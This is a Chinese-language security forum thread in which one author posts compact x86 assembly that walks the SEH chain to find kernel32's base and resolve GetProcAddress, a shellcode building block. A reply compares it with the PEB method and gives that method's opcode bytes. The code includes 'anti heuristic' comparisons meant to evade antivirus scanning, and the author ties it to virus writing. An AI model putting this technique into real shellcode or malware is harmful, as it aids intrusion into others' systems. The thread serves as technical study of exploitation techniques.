Skip to content

标题: 通过搜索SEH链表获取kernel32基址

作者: Hume(冷雨飘心)

在看Shellcode的时候,发现Shellcode编写中获取API地址好象怎么要么暴力搜索, 要么从PEB中获取,好像没人通过SEH链表中搜索?这是以前玩Vir的时候写的代码, 82字节获取kernel32基址和GetProcAddress地址:

;walking through the seh frame to get kernel32 addr ;search kernel32.dll to get GetProcAddress addr ;then use base of kernel32 and GetProcAddress to ;get all needed APIs ;82 Bytes

include '%fasinc%/win32as.inc' include '%fasinc%/pestruc.h'

.data buf rb 256 fmt db "Kernel32 base is: %X GetProcAddress is %X",13,10 db "SearchCodeSize is: %X",0 szTit db "By Hume 2K2+",0 hModulek32 dd 0 .codew api_List:

api_ends: StArT:

    xor     esi,esi
    lods    dword [fs:esi]  ;as small code as possible
  @@:
    inc     eax
    je      @F
    dec     eax
    xchg    esi,eax
    LODSD                   ;next seh_frame
    jmp     near @B
  @@:
    LODSD                   ;kernel32 func...
                            ;compare if PE_hdr
    xchg    esi,eax
find_pe_header:
    dec     esi
    xor     si,si           ;kernel32 is 64kb align
    mov     eax,[esi]
    add     ax,-'MZ'        ;anti heuristic
    jne     find_pe_header
    mov     edi,[esi+mzh.e_lfanew]   ;.e_lfanew
    mov     eax,[esi+edi]
    add     eax,-'PE'       ;anti heuristic
    jne     find_pe_header

    push     esi
                            ;esi=VA Kernel32.BASE
                            ;edi=RVA K32.pehdr
    mov     ebp,esi
    mov     edi,[ebp+edi+peh.DataDirectory]

    push    edi esi

    mov     eax,[ebp+edi+peexc.AddressOfNames]
    mov     edx,[ebp+edi+peexc.AddressOfNameOrdinals]
    call    @F
    db     "GetProcAddress",0
  @@:
    pop     edi
    mov     ecx,15
    sub     eax,4
 next_:
    add     eax,4
    add     edi,ecx
    sub     edi,15
    mov     esi,[ebp+eax]
    add     esi,ebp
    mov     ecx,15
    repz    cmpsb
    jnz     next_

    pop     esi edi

    sub     eax,[ebp+edi+peexc.AddressOfNames]
    shr     eax,1
    add     edx,ebp
    movzx   eax,word [edx+eax]
    add     esi,[ebp+edi+peexc.AddressOfFunctions]
    add     ebp,[esi+eax*4]         ;ebp=Kernel32.GetProcAddress.addr
                                    ;use GetProcAddress and hModule to get other func
    pop     esi                     ;esi=kernel32 Base

shell_end: invoke wsprintf,buf,fmt,esi,ebp,shell_end-StArT invoke MessageBox,0,buf,szTit,0x40

    invoke  ExitProcess,0

.end StArT

scz:

好像没人通过SEH链表中搜索?

你下面的代码我看了看,就是去找kernel32!UnhandledExceptionFilter(), 靠对齐假设定位kenel32的基址,是这个意思吧。也可以。

是啊,这个也够通用,9x/2K/XP/2003都可以,而且基本不用自己处理异常

暴力搜才要处理SEH,PEB方式就不用。这个是还可以,一般情况下没问题。不过PEB 方式可以假定PEB的起始地址,至少从NT到2003都未变,所以没你前面说的那么长:

fc cld eb75 jmp 0012fcfc 5f pop edi a10cf0fd7f mov eax,[7ffdf00c] 8b701c mov esi,[eax+0x1c] ad lodsd 8b6808 mov ebp,[eax+0x8]

这已经是包括了cld和jmp、pop指令的情形。不过你这个可以对付9x,这倒是我没想 到的,不错啊。